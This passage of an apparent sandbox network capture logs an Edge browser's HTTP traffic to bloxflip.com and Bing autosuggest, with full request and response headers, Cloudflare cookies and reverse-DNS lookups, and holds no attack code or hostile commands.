*.google.hu *.google.co.id *.google.ie *.google.co.il *.google.im *.google.co.in *.google.iq *.google.is *.google.it *.google.je *.google.com.jm *.google.jo *.google.co.jp *.google.co.ke *.google.com.kh *.google.ki *.google.kg *.google.co.kr *.google.com.kw *.google.kz *.google.la *.google.com.lb *.google.li *.google.lk *.google.co.ls *.google.lt *.google.lu *.google.lv *.google.com.ly *.google.co.ma *.google.md *.google.me *.google.mg *.google.mk *.google.ml *.google.com.mm *.google.mn *.google.com.mt *.google.mu *.google.mv *.google.mw *.google.com.mx *.google.com.my *.google.co.mz *.google.com.na *.google.com.ng *.google.com.ni *.google.ne *.google.nl *.google.no *.google.com.np *.google.nr *.google.nu *.google.co.nz *.google.com.om *.google.com.pa *.google.com.pe *.google.com.pg *.google.com.ph *.google.com.pk *.google.pl *.google.pn *.google.com.pr *.google.ps *.google.pt *.google.com.py *.google.com.qa *.google.ro *.google.ru *.google.rw *.google.com.sa *.google.com.sb *.google.sc *.google.se *.google.com.sg *.google.sh *.google.si *.google.sk *.google.com.sl *.google.sn *.google.so *.google.sm *.google.sr *.google.st *.google.com.sv *.google.td *.google.tg *.google.co.th *.google.com.tj *.google.tl *.google.tm *.google.tn *.google.to *.google.com.tr *.google.tt *.google.com.tw *.google.co.tz *.google.com.ua *.google.co.ug *.google.co.uk *.google.com.uy *.google.co.uz *.google.com.vc *.google.co.ve *.google.co.vi *.google.com.vn *.google.vu *.google.ws *.google.rs *.google.co.za *.google.co.zm *.google.co.zw *.google.cat bing.com *.bing.com apple.com *.apple.com cdn-apple.com *.cdn-apple.com taboola.com *.taboola.com onesignal.com *.onesignal.com intercom.io *.intercom.io blox.land *.blox.land termly.io *.termly.io api.ipify.org cdn.growthbook.io *.bloxflip.com stripe.com *.inteniq.com *.stripe.com *.roblox.com *.robloxlabs.com *.rbx.com *.rbxcdn.com *.roblox.cn *.simulpong.com *.lightstep.com *.ns1p.net *.arkoselabs.com *.kaptcha.com *.google.com *.google-analytics.com *.doubleclick.net *.sentry.io wss://*.intercom.io *.tiktok.com tiktok.com *.mixpanel.com wss://*.hotjar.io *.hotjar.io wss://*.bloxflip.com wss://realtime.roblox.com wss://realtime.sitetest1.robloxlabs.com wss://realtime.sitetest2.robloxlabs.com wss://realtime.sitetest3.robloxlabs.com wss://realtime-signalr.roblox.com *.braintree-api.com hcaptcha.com googletagmanager.com videodelivery.net *.cloudflarestream.com *.hcaptcha.com *.braintreegateway.com d1q2u37vreaobr.cloudfront.net funcaptcha.com; report-uri https://6513195608615f75764fb31f.endpoint.csper.io?v=0;
server: cloudflare
cf-ray: 8cdea399b8d6656c-AMS
content-encoding: br
GET

https://bloxflip.com/favicon.ico

msedge.exe

Remote address:

104.18.30.95:443

Request

GET /favicon.ico HTTP/2.0
host: bloxflip.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: __cf_bm=znaDhnOIxvdm3ZSKhnWEvE3a9rSxGEpLq_6t0OR0A_Y-1728144175-1.0.1.1-Arz_gBy.Rid_Je1KKm1jOCCSlUA4NIv6g6sUSZaMuicBwd0QLdYk1XZb21SXEbtd3bLo9_4lBxI50GktdskzaQ

Response

HTTP/2.0 403

date: Sat, 05 Oct 2024 16:02:58 GMT
content-type: text/html; charset=UTF-8
x-frame-options: SAMEORIGIN
cache-control: max-age=15
expires: Sat, 05 Oct 2024 16:03:13 GMT
vary: Accept-Encoding
referrer-policy: no-referrer
content-security-policy: connect-src 'self' https://bloxflip.com https://bloxgame.com *.seondnsresolve.com *.seondfresolver.com *.deviceinfresolver.com *.seonintelligence.com https://bloxflip-frontend-staging.bazooki-infra.dev http://localhost:3000 *.studs.ltd *.bloxbill.com bloxbill.com wss://*.amazonaws.com *.amazonaws.com *.intentiq.com *.nitropay.com *.googleapis.com *.intercomcdn.com *.userway.org *.softswiss.net *.agechecker.net *.google.com *.google.ad *.google.ae *.google.com.af *.google.com.ag *.google.al *.google.am *.google.co.ao *.google.com.ar *.google.as *.google.at *.google.com.au *.google.az *.google.ba *.google.com.bd *.google.be *.google.bf *.google.bg *.google.com.bh *.google.bi *.google.bj *.google.com.bn *.google.com.bo *.google.com.br *.google.bs *.google.bt *.google.co.bw *.google.by *.google.com.bz *.google.ca *.google.cd *.google.cf *.google.cg *.google.ch *.google.ci *.google.co.ck *.google.cl *.google.cm *.google.cn *.google.com.co *.google.co.cr *.google.com.cu *.google.cv *.google.com.cy *.google.cz *.google.de *.google.dj *.google.dk *.google.dm *.google.com.do *.google.dz *.google.com.ec *.google.ee *.google.com.eg *.google.es *.google.com.et *.google.fi *.google.com.fj *.google.fm *.google.fr *.google.ga *.google.ge *.google.gg *.google.com.gh *.google.com.gi *.google.gl *.google.gm *.google.gr *.google.com.gt *.google.gy *.google.com.hk *.google.hn *.google.hr *.google.ht *.google.hu *.google.co.id *.google.ie *.google.co.il *.google.im *.google.co.in *.google.iq *.google.is *.google.it *.google.je *.google.com.jm *.google.jo *.google.co.jp *.google.co.ke *.google.com.kh *.google.ki *.google.kg *.google.co.kr *.google.com.kw *.google.kz *.google.la *.google.com.lb *.google.li *.google.lk *.google.co.ls *.google.lt *.google.lu *.google.lv *.google.com.ly *.google.co.ma *.google.md *.google.me *.google.mg *.google.mk *.google.ml *.google.com.mm *.google.mn *.google.com.mt *.google.mu *.google.mv *.google.mw *.google.com.mx *.google.com.my *.google.co.mz *.google.com.na *.google.com.ng *.google.com.ni *.google.ne *.google.nl *.google.no *.google.com.np *.google.nr *.google.nu *.google.co.nz *.google.com.om *.google.com.pa *.google.com.pe *.google.com.pg *.google.com.ph *.google.com.pk *.google.pl *.google.pn *.google.com.pr *.google.ps *.google.pt *.google.com.py *.google.com.qa *.google.ro *.google.ru *.google.rw *.google.com.sa *.google.com.sb *.google.sc *.google.se *.google.com.sg *.google.sh *.google.si *.google.sk *.google.com.sl *.google.sn *.google.so *.google.sm *.google.sr *.google.st *.google.com.sv *.google.td *.google.tg *.google.co.th *.google.com.tj *.google.tl *.google.tm *.google.tn *.google.to *.google.com.tr *.google.tt *.google.com.tw *.google.co.tz *.google.com.ua *.google.co.ug *.google.co.uk *.google.com.uy *.google.co.uz *.google.com.vc *.google.co.ve *.google.co.vi *.google.com.vn *.google.vu *.google.ws *.google.rs *.google.co.za *.google.co.zm *.google.co.zw *.google.cat bing.com *.bing.com apple.com *.apple.com cdn-apple.com *.cdn-apple.com taboola.com *.taboola.com onesignal.com *.onesignal.com intercom.io *.intercom.io blox.land *.blox.land termly.io *.termly.io api.ipify.org cdn.growthbook.io *.bloxflip.com stripe.com *.inteniq.com *.stripe.com *.roblox.com *.robloxlabs.com *.rbx.com *.rbxcdn.com *.roblox.cn *.simulpong.com *.lightstep.com *.ns1p.net *.arkoselabs.com *.kaptcha.com *.google.com *.google-analytics.com *.doubleclick.net *.sentry.io wss://*.intercom.io *.tiktok.com tiktok.com *.mixpanel.com wss://*.hotjar.io *.hotjar.io wss://*.bloxflip.com wss://realtime.roblox.com wss://realtime.sitetest1.robloxlabs.com wss://realtime.sitetest2.robloxlabs.com wss://realtime.sitetest3.robloxlabs.com wss://realtime-signalr.roblox.com *.braintree-api.com hcaptcha.com googletagmanager.com videodelivery.net *.cloudflarestream.com *.hcaptcha.com *.braintreegateway.com d1q2u37vreaobr.cloudfront.net funcaptcha.com; report-uri https://6513195608615f75764fb31f.endpoint.csper.io?v=0;
server: cloudflare
cf-ray: 8cdea39a2960656c-AMS
content-encoding: br
POST

https://bloxflip.com/cdn-cgi/challenge-platform/h/g/jsd/r/8cdea388b8df569a

msedge.exe

Remote address:

104.18.30.95:443

Request

POST /cdn-cgi/challenge-platform/h/g/jsd/r/8cdea388b8df569a HTTP/2.0
host: bloxflip.com
content-length: 14056
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: application/json
accept: */*
origin: https://bloxflip.com
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: __cf_bm=znaDhnOIxvdm3ZSKhnWEvE3a9rSxGEpLq_6t0OR0A_Y-1728144175-1.0.1.1-Arz_gBy.Rid_Je1KKm1jOCCSlUA4NIv6g6sUSZaMuicBwd0QLdYk1XZb21SXEbtd3bLo9_4lBxI50GktdskzaQ

Response

HTTP/2.0 200

date: Sat, 05 Oct 2024 16:02:58 GMT
content-type: text/plain; charset=UTF-8
content-length: 0
set-cookie: cf_clearance=; Path=/; Expires=Thu, 01-Jan-70 00:00:00 GMT; Domain=.bloxflip.com; HttpOnly; Secure; SameSite=None
set-cookie: cf_clearance=mbsQoUz8yGmXxYnZKdEGaU8awPhnSoiCkool2f0NVGY-1728144178-1.2.1.1-0q4i1l2_bt8ZJ9xfoF1MXDYICQrhCpBiBs4iNdLHx0GeQs9mBh.4cWHYG3tBzinXVElPJ_iQldpcdZvvrj5MOGcFbFWRhQgO7o7N6hs_d8kvhjhLyJVLopKIxlql5Ax_3gLCj7gBESP1Q28HnkQMLpiOxk5_OvioJzur8.XXeTKdgG.YZGhTi_X.hUjjMrxV9y403iS3aO4H4MIWc.YTYwgwWFJx5XF_xdn3gI5JplH0hFoBovQJR4LtIg1SsRRTkmp6rx0TNAhqpMbCyWHHyRHAj0Q3QW_7t3WTouH3VqZHBMEplB3t99ouI9N6JjIRVgYrBz_VhONmjiimpPFcU6GlDiz3GbFAfJcFdzVgJmk5zk1bBWET2RG5zlfmtjQ2tQRf5.3tDnsoptR_dpQlyg; Path=/; Expires=Sun, 05-Oct-25 16:02:58 GMT; Domain=.bloxflip.com; HttpOnly; Secure; SameSite=None; Partitioned
referrer-policy: no-referrer
content-security-policy: connect-src 'self' https://bloxflip.com https://bloxgame.com *.seondnsresolve.com *.seondfresolver.com *.deviceinfresolver.com *.seonintelligence.com https://bloxflip-frontend-staging.bazooki-infra.dev http://localhost:3000 *.studs.ltd *.bloxbill.com bloxbill.com wss://*.amazonaws.com *.amazonaws.com *.intentiq.com *.nitropay.com *.googleapis.com *.intercomcdn.com *.userway.org *.softswiss.net *.agechecker.net *.google.com *.google.ad *.google.ae *.google.com.af *.google.com.ag *.google.al *.google.am *.google.co.ao *.google.com.ar *.google.as *.google.at *.google.com.au *.google.az *.google.ba *.google.com.bd *.google.be *.google.bf *.google.bg *.google.com.bh *.google.bi *.google.bj *.google.com.bn *.google.com.bo *.google.com.br *.google.bs *.google.bt *.google.co.bw *.google.by *.google.com.bz *.google.ca *.google.cd *.google.cf *.google.cg *.google.ch *.google.ci *.google.co.ck *.google.cl *.google.cm *.google.cn *.google.com.co *.google.co.cr *.google.com.cu *.google.cv *.google.com.cy *.google.cz *.google.de *.google.dj *.google.dk *.google.dm *.google.com.do *.google.dz *.google.com.ec *.google.ee *.google.com.eg *.google.es *.google.com.et *.google.fi *.google.com.fj *.google.fm *.google.fr *.google.ga *.google.ge *.google.gg *.google.com.gh *.google.com.gi *.google.gl *.google.gm *.google.gr *.google.com.gt *.google.gy *.google.com.hk *.google.hn *.google.hr *.google.ht *.google.hu *.google.co.id *.google.ie *.google.co.il *.google.im *.google.co.in *.google.iq *.google.is *.google.it *.google.je *.google.com.jm *.google.jo *.google.co.jp *.google.co.ke *.google.com.kh *.google.ki *.google.kg *.google.co.kr *.google.com.kw *.google.kz *.google.la *.google.com.lb *.google.li *.google.lk *.google.co.ls *.google.lt *.google.lu *.google.lv *.google.com.ly *.google.co.ma *.google.md *.google.me *.google.mg *.google.mk *.google.ml *.google.com.mm *.google.mn *.google.com.mt *.google.mu *.google.mv *.google.mw *.google.com.mx *.google.com.my *.google.co.mz *.google.com.na *.google.com.ng *.google.com.ni *.google.ne *.google.nl *.google.no *.google.com.np *.google.nr *.google.nu *.google.co.nz *.google.com.om *.google.com.pa *.google.com.pe *.google.com.pg *.google.com.ph *.google.com.pk *.google.pl *.google.pn *.google.com.pr *.google.ps *.google.pt *.google.com.py *.google.com.qa *.google.ro *.google.ru *.google.rw *.google.com.sa *.google.com.sb *.google.sc *.google.se *.google.com.sg *.google.sh *.google.si *.google.sk *.google.com.sl *.google.sn *.google.so *.google.sm *.google.sr *.google.st *.google.com.sv *.google.td *.google.tg *.google.co.th *.google.com.tj *.google.tl *.google.tm *.google.tn *.google.to *.google.com.tr *.google.tt *.google.com.tw *.google.co.tz *.google.com.ua *.google.co.ug *.google.co.uk *.google.com.uy *.google.co.uz *.google.com.vc *.google.co.ve *.google.co.vi *.google.com.vn *.google.vu *.google.ws *.google.rs *.google.co.za *.google.co.zm *.google.co.zw *.google.cat bing.com *.bing.com apple.com *.apple.com cdn-apple.com *.cdn-apple.com taboola.com *.taboola.com onesignal.com *.onesignal.com intercom.io *.intercom.io blox.land *.blox.land termly.io *.termly.io api.ipify.org cdn.growthbook.io *.bloxflip.com stripe.com *.inteniq.com *.stripe.com *.roblox.com *.robloxlabs.com *.rbx.com *.rbxcdn.com *.roblox.cn *.simulpong.com *.lightstep.com *.ns1p.net *.arkoselabs.com *.kaptcha.com *.google.com *.google-analytics.com *.doubleclick.net *.sentry.io wss://*.intercom.io *.tiktok.com tiktok.com *.mixpanel.com wss://*.hotjar.io *.hotjar.io wss://*.bloxflip.com wss://realtime.roblox.com wss://realtime.sitetest1.robloxlabs.com wss://realtime.sitetest2.robloxlabs.com wss://realtime.sitetest3.robloxlabs.com wss://realtime-signalr.roblox.com *.braintree-api.com hcaptcha.com googletagmanager.com videodelivery.net *.cloudflarestream.com *.hcaptcha.com *.braintreegateway.com d1q2u37vreaobr.cloudfront.net funcaptcha.com; report-uri https://6513195608615f75764fb31f.endpoint.csper.io?v=0;
server: cloudflare
cf-ray: 8cdea39b9b31656c-AMS
DNS

154.239.44.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

154.239.44.20.in-addr.arpa

IN PTR

Response
DNS

212.20.149.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

212.20.149.52.in-addr.arpa

IN PTR

Response
DNS

206.23.85.13.in-addr.arpa

Remote address:

8.8.8.8:53

Request

206.23.85.13.in-addr.arpa

IN PTR

Response
DNS

98.117.19.2.in-addr.arpa

Remote address:

8.8.8.8:53

Request

98.117.19.2.in-addr.arpa

IN PTR

Response

98.117.19.2.in-addr.arpa

IN PTR

a2-19-117-98deploystaticakamaitechnologiescom
GET

https://www.bing.com/qbox?query=pp&language=en-US&pt=EdgBox&cvid=02bcc1d54a1b47799c7d1093d1646595&ig=827a2eb50abb498f83409a54f5ce619b&oit=1&cp=2&pgcl=4

msedge.exe

Remote address:

92.123.128.135:443

Request

GET /qbox?query=pp&language=en-US&pt=EdgBox&cvid=02bcc1d54a1b47799c7d1093d1646595&ig=827a2eb50abb498f83409a54f5ce619b&oit=1&cp=2&pgcl=4 HTTP/1.1
Host: www.bing.com
Connection: keep-alive
Sec-Fetch-Site: none
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
GET

https://www.bing.com/qbox?query=ppornh&language=en-US&pt=EdgBox&cvid=02bcc1d54a1b47799c7d1093d1646595&ig=3da66ae652e445b1816ca6e1a6fe289c&oit=1&cp=6&pgcl=4

msedge.exe

Remote address:

92.123.128.135:443

Request

GET /qbox?query=ppornh&language=en-US&pt=EdgBox&cvid=02bcc1d54a1b47799c7d1093d1646595&ig=3da66ae652e445b1816ca6e1a6fe289c&oit=1&cp=6&pgcl=4 HTTP/1.1
Host: www.bing.com
Connection: keep-alive
Sec-Fetch-Site: none
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
GET

https://www.bing.com/qbox?query=ppornhu&language=en-US&pt=EdgBox&cvid=02bcc1d54a1b47799c7d1093d1646595&ig=f7c79edc0b77498fb19538d8b85f76e8&oit=1&cp=7&pgcl=4

msedge.exe

Remote address:

92.123.128.135:443

Request

GET /qbox?query=ppornhu&language=en-US&pt=EdgBox&cvid=02bcc1d54a1b47799c7d1093d1646595&ig=f7c79edc0b77498fb19538d8b85f76e8&oit=1&cp=7&pgcl=4 HTTP/1.1
Host: www.bing.com
Connection: keep-alive
Sec-Fetch-Site: none
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
DNS

135.128.123.92.in-addr.arpa

Remote address:

8.8.8.8:53

Request

135.128.123.92.in-addr.arpa

IN PTR

Response

135.128.123.92.in-addr.arpa

IN PTR

a92-123-128-135deploystaticakamaitechnologiescom
GET

https://www.bing.com/qbox?query=ppornhub&language=en-US&pt=EdgBox&cvid=02bcc1d54a1b47799c7d1093d1646595&ig=7efacfc75e21463d9d03684359e73928&oit=1&cp=8&pgcl=4

msedge.exe

Remote address:

92.123.128.135:443

Request

GET /qbox?query=ppornhub&language=en-US&pt=EdgBox&cvid=02bcc1d54a1b47799c7d1093d1646595&ig=7efacfc75e21463d9d03684359e73928&oit=1&cp=8&pgcl=4 HTTP/1.1
Host: www.bing.com
Connection: keep-alive
Sec-Fetch-Site: none
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Content-Length: 137
Content-Type: application/json; charset=utf-8
Cache-Control: public, max-age=300
Content-Encoding: gzip
Vary: Accept-Encoding
X-EventID: 6701636ca3dd455d8d67f1f692d23662
UserAgentReductionOptOut: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
Content-Security-Policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-pMYS0Gd2Of5WAhl758hVFF/XUpMmSybSILxnaYUF5Pc='; base-uri 'self';report-to csp-endpoint
Report-To: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Date: Sat, 05 Oct 2024 16:03:56 GMT
Connection: keep-alive
Set-Cookie: MUID=22AB487753D264430C9F5D7852A06511; domain=.bing.com; expires=Thu, 30-Oct-2025 16:03:56 GMT; path=/; secure; SameSite=None
Set-Cookie: MUIDB=22AB487753D264430C9F5D7852A06511; expires=Thu, 30-Oct-2025 16:03:56 GMT; path=/; HttpOnly
Set-Cookie: _EDGE_S=F=1&SID=3C228F3FEFB564BD3D819A30EEC76590; domain=.bing.com; path=/; HttpOnly
Set-Cookie: _EDGE_V=1; domain=.bing.com; expires=Thu, 30-Oct-2025 16:03:56 GMT; path=/; HttpOnly
Set-Cookie: USRLOC=HS=1; domain=.bing.com; expires=Thu, 30-Oct-2025 16:03:56 GMT; path=/; secure; HttpOnly; SameSite=None
Set-Cookie: SRCHD=AF=NOFORM; domain=.bing.com; expires=Thu, 30-Oct-2025 16:03:56 GMT; path=/; secure; SameSite=None
Set-Cookie: SRCHUID=V=2&GUID=D60D2B7524424093B3CA32E314A067A8&dmnchg=1; domain=.bing.com; expires=Thu, 30-Oct-2025 16:03:56 GMT; path=/; secure; SameSite=None
Set-Cookie: SRCHUSR=DOB=20241005; domain=.bing.com; expires=Thu, 30-Oct-2025 16:03:56 GMT; path=/; secure; SameSite=None
Set-Cookie: SRCHHPGUSR=SRCHLANG=en; domain=.bing.com; expires=Thu, 30-Oct-2025 16:03:56 GMT; path=/; secure; SameSite=None
Set-Cookie: _SS=SID=3C228F3FEFB564BD3D819A30EEC76590; domain=.bing.com; path=/; secure; SameSite=None
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.c3777b5c.1728144236.10344ba0
GET

https://www.bing.com/qbox?query=ppornhub.&language=en-US&pt=EdgBox&cvid=02bcc1d54a1b47799c7d1093d1646595&ig=193fa52e2e8d4de087c3ff515f11a259&oit=1&cp=9&pgcl=4

msedge.exe

Remote address:

92.123.128.135:443

Request

GET /qbox?query=ppornhub.&language=en-US&pt=EdgBox&cvid=02bcc1d54a1b47799c7d1093d1646595&ig=193fa52e2e8d4de087c3ff515f11a259&oit=1&cp=9&pgcl=4 HTTP/1.1
Host: www.bing.com
Connection: keep-alive
Sec-Fetch-Site: none
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Content-Length: 137
Content-Type: application/json; charset=utf-8
Cache-Control: public, max-age=300
Content-Encoding: gzip
Vary: Accept-Encoding
X-EventID: 6701636c8b3040fb8240e1fc66f24a16
UserAgentReductionOptOut: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
Content-Security-Policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-Q5vGvhE0LBp89pjD5z1si8VcQRltHne9sleiLFS5diM='; base-uri 'self';report-to csp-endpoint
Report-To: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Date: Sat, 05 Oct 2024 16:03:57 GMT
Connection: keep-alive
Set-Cookie: MUID=1AA361E7949F6C8A11A874E895966DF9; domain=.bing.com; expires=Thu, 30-Oct-2025 16:03:56 GMT; path=/; secure; SameSite=None
Set-Cookie: MUIDB=1AA361E7949F6C8A11A874E895966DF9; expires=Thu, 30-Oct-2025 16:03:56 GMT; path=/; HttpOnly
Set-Cookie: _EDGE_S=F=1&SID=1D8BCF2538C06DC5286FDA2A39C96CCB; domain=.bing.com; path=/; HttpOnly
Set-Cookie: _EDGE_V=1; domain=.bing.com; expires=Thu, 30-Oct-2025 16:03:56 GMT; path=/; HttpOnly
Set-Cookie: USRLOC=HS=1; domain=.bing.com; expires=Thu, 30-Oct-2025 16:03:56 GMT; path=/; secure; HttpOnly; SameSite=None
Set-Cookie: SRCHD=AF=NOFORM; domain=.bing.com; expires=Thu, 30-Oct-2025 16:03:56 GMT; path=/; secure; SameSite=None
Set-Cookie: SRCHUID=V=2&GUID=742352A5CB8544D3819E896376803D4B&dmnchg=1; domain=.bing.com; expires=Thu, 30-Oct-2025 16:03:56 GMT; path=/; secure; SameSite=None
Set-Cookie: SRCHUSR=DOB=20241005; domain=.bing.com; expires=Thu, 30-Oct-2025 16:03:56 GMT; path=/; secure; SameSite=None
Set-Cookie: SRCHHPGUSR=SRCHLANG=en; domain=.bing.com; expires=Thu, 30-Oct-2025 16:03:56 GMT; path=/; secure; SameSite=None
Set-Cookie: _SS=SID=1D8BCF2538C06DC5286FDA2A39C96CCB; domain=.bing.com; path=/; secure; SameSite=None
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.c3777b5c.1728144236.10344cac
GET

https://www.bing.com/qbox?query=ppornhub.c&language=en-US&pt=EdgBox&cvid=02bcc1d54a1b47799c7d1093d1646595&ig=b7f85f2a85e548deb498e088c17e8fd9&oit=1&cp=10&pgcl=4

msedge.exe

Remote address:

92.123.128.135:443

Request

GET /qbox?query=ppornhub.c&language=en-US&pt=EdgBox&cvid=02bcc1d54a1b47799c7d1093d1646595&ig=b7f85f2a85e548deb498e088c17e8fd9&oit=1&cp=10&pgcl=4 HTTP/1.1
Host: www.bing.com
Connection: keep-alive
Sec-Fetch-Site: none
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Content-Length: 138
Content-Type: application/json; charset=utf-8
Cache-Control: public, max-age=300
Content-Encoding: gzip
Vary: Accept-Encoding
X-EventID: 6701636d6e2b44e498a52bb6edeaf503
UserAgentReductionOptOut: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
Content-Security-Policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-wo3KtoLWGzeGWVFqnINpnoJ72WYPnnnO3cyz+2778XY='; base-uri 'self';report-to csp-endpoint
Report-To: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Date: Sat, 05 Oct 2024 16:03:57 GMT
Connection: keep-alive
Set-Cookie: MUID=0F7F3C4D32C06EDE0391294233826F69; domain=.bing.com; expires=Thu, 30-Oct-2025 16:03:57 GMT; path=/; secure; SameSite=None
Set-Cookie: MUIDB=0F7F3C4D32C06EDE0391294233826F69; expires=Thu, 30-Oct-2025 16:03:57 GMT; path=/; HttpOnly
Set-Cookie: _EDGE_S=F=1&SID=00A6D6A3CD5A638525D8C3ACCC1862BC; domain=.bing.com; path=/; HttpOnly
Set-Cookie: _EDGE_V=1; domain=.bing.com; expires=Thu, 30-Oct-2025 16:03:57 GMT; path=/; HttpOnly
Set-Cookie: USRLOC=HS=1; domain=.bing.com; expires=Thu, 30-Oct-2025 16:03:57 GMT; path=/; secure; HttpOnly; SameSite=None
Set-Cookie: SRCHD=AF=NOFORM; domain=.bing.com; expires=Thu, 30-Oct-2025 16:03:57 GMT; path=/; secure; SameSite=None
Set-Cookie: SRCHUID=V=2&GUID=B0E6561ADEF44B76874DEAAA1E4B5FEA&dmnchg=1; domain=.bing.com; expires=Thu, 30-Oct-2025 16:03:57 GMT; path=/; secure; SameSite=None
Set-Cookie: SRCHUSR=DOB=20241005; domain=.bing.com; expires=Thu, 30-Oct-2025 16:03:57 GMT; path=/; secure; SameSite=None
Set-Cookie: SRCHHPGUSR=SRCHLANG=en; domain=.bing.com; expires=Thu, 30-Oct-2025 16:03:57 GMT; path=/; secure; SameSite=None
Set-Cookie: _SS=SID=00A6D6A3CD5A638525D8C3ACCC1862BC; domain=.bing.com; path=/; secure; SameSite=None
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.c3777b5c.1728144237.10345090
GET

https://www.bing.com/qbox?query=ppornhub.co&language=en-US&pt=EdgBox&cvid=02bcc1d54a1b47799c7d1093d1646595&ig=61b72370268f4dcebca06b44f5341c06&oit=3&cp=11&pgcl=4

msedge.exe

Remote address:

92.123.128.135:443

Request

GET /qbox?query=ppornhub.co&language=en-US&pt=EdgBox&cvid=02bcc1d54a1b47799c7d1093d1646595&ig=61b72370268f4dcebca06b44f5341c06&oit=3&cp=11&pgcl=4 HTTP/1.1
Host: www.bing.com
Connection: keep-alive
Sec-Fetch-Site: none
Sec-Fetch-Mode: no-cors
